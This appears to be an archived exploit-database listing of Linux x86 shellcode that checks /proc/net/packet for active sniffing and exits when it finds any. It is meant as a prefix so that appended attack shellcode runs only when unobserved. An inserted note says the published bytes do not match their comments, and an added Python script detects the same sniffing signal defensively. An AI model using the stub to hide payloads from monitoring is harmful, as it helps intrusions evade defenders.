Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)

EDB-ID: 13332
CVE: N/A
Platform: Linux_x86
Date: 2008-11-18

/*
 ▐▄∙ ▄  ▄▄▄ .  ▐ ▄         ∙ ▌ ▄ ·.  ▄∙ ▄▌ ▄▄▄▄▄  ▄▄▄· 
  █▌█▌■ ▀▄.▀· ∙█▌▐█ ■      ·██ ▐███■ █■██▌ ∙██   ▐█ ▀█ 
  ·██·  ▐▀▀■▄ ▐█▐▐▌  ▄█▀▄  ▐█ ▌▐▌▐█· █▌▐█▌  ▐█.■ ▄█▀▀█ 
 ■▐█·█▌ ▐█▄▄▌ ██▐█▌ ▐█▌.▐▌ ██ ██▌▐█▌ ▐█▄█▌  ▐█▌· ▐█ ■▐▌
 ∙▀▀ ▀▀  ▀▀▀  ▀▀ █■  ▀█▄▀■ ▀▀  █■▀▀▀  ▀▀▀   ▀▀▀   ▀  ▀ 

Ho' Detector (Promiscuous mode detector shellcode) 
by XenoMuta <xenomuta[at]phreaker[dot]net>
http://xenomuta.tuxfamily.org/

This shellcode uses a stupid, yet effective method
for detecting sniffing on all interfaces in linux:
parsing /proc/net/packet, which lists the open packet
sockets (what libpcap captures through) and holds only
its header line (56 bytes) when nothing is sniffing.
*/

/*
Note: the 0x66 operand-size prefix on several instructions below selects
the 16-bit forms (xor ax,ax; push ax; push word imm16; mov bx,sp; ...),
not the 32-bit forms named in the comments. The bytes are reproduced
exactly as published.
*/
char sc[] =
"\x66\x31\xC0"                // xor eax,eax
"\x66\x50"                    // push eax
"\x66\x68\x63\x6B\x65\x74"    // push dword 0x74656b63 ; cket
"\x66\x68\x74\x2F\x70\x61"    // push dword 0x61702f74 ; t/pa
"\x66\x68\x63\x2F\x6E\x65"    // push dword 0x656e2f63 ; c/ne
"\x66\x68\x2F\x70\x72\x6F"    // push dword 0x6f72702f ; /pro
"\xB0\x05"                    // mov al,0x5            ; open()
"\x66\x89\xE3"                // mov ebx,esp           ; /proc/net/packet
"\x66\x31\xC9"                // xor ecx,ecx           ; O_RDONLY
"\xCD\x80"                    // int 0x80
"\x66\x93"                    // xchg eax,ebx          ; fd -> ebx
"\x6A\x03"                    // push byte +0x3        ; read()
"\x66\x58"                    // pop eax
"\x66\x89\xE1"                // mov ecx,esp           ; buffer on the stack
"\x6A\x39"                    // push byte +0x39       ; at most 57 bytes
"\x66\x5A"                    // pop edx
"\xCD\x80"                    // int 0x80
"\x3C\x38"                    // cmp al,0x38           ; if only 56 bytes
"\x74\x06"                    // jz 0x40               ; there is no packet
"\x6A\x01"                    // push byte +0x1        ; capture. Proceed
"\x66\x58"                    // pop eax               ; with shellcode
"\xCD\x80"                    // int 0x80              ; else, exit()
/*
Append your shellcode here
*/
"\x90";

/*
Test harness: jumps into the byte array above. sc lives in .data, so the
binary must be built with executable data pages (e.g. gcc -m32 -z execstack
on i386, where an executable stack also makes data pages executable).
*/
int main(void)
{
    (*(void (*)(void)) sc)();
    return 0;
}
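The same signal the shellcode reads, done from the defender's side: the following Python is an added example (not part of the original listing or of XenoMuta's code) that parses /proc/net/packet, maps each open packet socket's inode to its owning process through /proc/<pid>/fd, and separately checks the IFF_PROMISC flag in /sys/class/net/<if>/flags, since an open packet socket (dhclient, lldpd and friends use them too) is not the same thing as an interface in promiscuous mode. The header string, the column layout (sk, RefCnt, Type, Proto, Iface, R, Rmem, User, Inode, with Proto printed in hex), the IFF_PROMISC value 0x100 and the sample rows are assumptions stated in the code; the sample table is constructed, not captured from a real host.

```python
"""Added example: report open AF_PACKET sockets and promiscuous interfaces
from procfs/sysfs, the same signal the shellcode on this page checks."""
import os
from typing import Dict, Iterable, List, Optional

# Header line written by the kernel for /proc/net/packet (assumed layout).
# It is 56 bytes including the newline, the length the shellcode compares
# the read() result against.
PACKET_HEADER = "sk       RefCnt Type Proto  Iface R Rmem   User   Inode\n"

SOCK_TYPES = {2: "SOCK_DGRAM", 3: "SOCK_RAW"}
ETH_P_ALL = 0x0003      # protocol libpcap binds to capture every frame
IFF_PROMISC = 0x100     # bit in /sys/class/net/<if>/flags (assumed value)

# Constructed sample (not from a real host): header plus one raw socket
# bound to all interfaces (Iface 0) for ETH_P_ALL, owned by uid 0.
SAMPLE = PACKET_HEADER + \
    "0000000000000000 3      3    0003   0     1 0      0      123456\n"


def parse_packet_table(text: str) -> List[Dict[str, int]]:
    """Parse /proc/net/packet text into one dict per open packet socket."""
    lines = text.splitlines()
    if not lines or lines[0].split() != PACKET_HEADER.split():
        raise ValueError("unexpected /proc/net/packet header: %r" % lines[:1])
    sockets = []
    for line in lines[1:]:
        fields = line.split()
        if len(fields) != 9:
            continue                      # not a socket row
        sockets.append({
            "type": int(fields[2]),
            "proto": int(fields[3], 16),  # printed as %04x
            "ifindex": int(fields[4]),    # 0 = bound to all interfaces
            "running": int(fields[5]),
            "uid": int(fields[7]),
            "inode": int(fields[8]),
        })
    return sockets


def capture_in_progress(text: str) -> bool:
    """True when any packet socket exists (file longer than its header)."""
    return len(parse_packet_table(text)) > 0


def flags_is_promisc(flags_text: str) -> bool:
    """Decode the hex value of /sys/class/net/<if>/flags, test IFF_PROMISC."""
    return bool(int(flags_text.strip(), 16) & IFF_PROMISC)


def owner_from_fd_links(inode: int,
                        fd_links: Dict[int, Iterable[str]]) -> Optional[int]:
    """Map a socket inode to a pid given each pid's /proc/<pid>/fd targets."""
    wanted = "socket:[%d]" % inode
    for pid, targets in fd_links.items():
        if wanted in targets:
            return pid
    return None


def collect_fd_links(proc: str = "/proc") -> Dict[int, List[str]]:
    """Read every readable /proc/<pid>/fd/* symlink (root sees all users)."""
    links: Dict[int, List[str]] = {}
    for name in os.listdir(proc):
        if not name.isdigit():
            continue
        fd_dir = os.path.join(proc, name, "fd")
        try:
            links[int(name)] = [os.readlink(os.path.join(fd_dir, fd))
                                for fd in os.listdir(fd_dir)]
        except OSError:
            continue                      # process exited or not ours
    return links


def report(text: str, fd_links: Dict[int, Iterable[str]],
           promisc: Iterable[str] = ()) -> List[str]:
    """One human-readable finding per packet socket / promiscuous interface."""
    out = []
    for s in parse_packet_table(text):
        pid = owner_from_fd_links(s["inode"], fd_links)
        out.append("packet socket %s proto=0x%04x ifindex=%d uid=%d pid=%s" % (
            SOCK_TYPES.get(s["type"], str(s["type"])), s["proto"],
            s["ifindex"], s["uid"], pid if pid is not None else "?"))
    for ifname in promisc:
        out.append("interface %s has IFF_PROMISC set" % ifname)
    return out


if __name__ == "__main__":
    try:  # live host if readable, otherwise fall back to the constructed sample
        with open("/proc/net/packet") as f:
            table = f.read()
        fd_links = collect_fd_links()
        promisc = [n for n in os.listdir("/sys/class/net")
                   if flags_is_promisc(open("/sys/class/net/%s/flags" % n).read())]
    except OSError:
        table, fd_links, promisc = SAMPLE, {4242: ["socket:[123456]"]}, []
    print("\n".join(report(table, fd_links, promisc)) or "no packet sockets open")
```

Run as root to resolve inodes for every process; without privileges `collect_fd_links` silently skips other users' processes and the pid column shows "?". Treat a hit as a lead, not a verdict: legitimate daemons open packet sockets, so correlate the owning process and the IFF_PROMISC flag before raising an alert.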
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkkjGO0ACgkQ2LnNaOYR/B1h1QCg2uatkfAzSE5Jgc3bzJmFU/3s
opMAoLufSxvFoSNl3W+6h5rxmLIcq2Mp
=ISTU
-----END PGP SIGNATURE-----

// milw0rm.com [2008-11-18]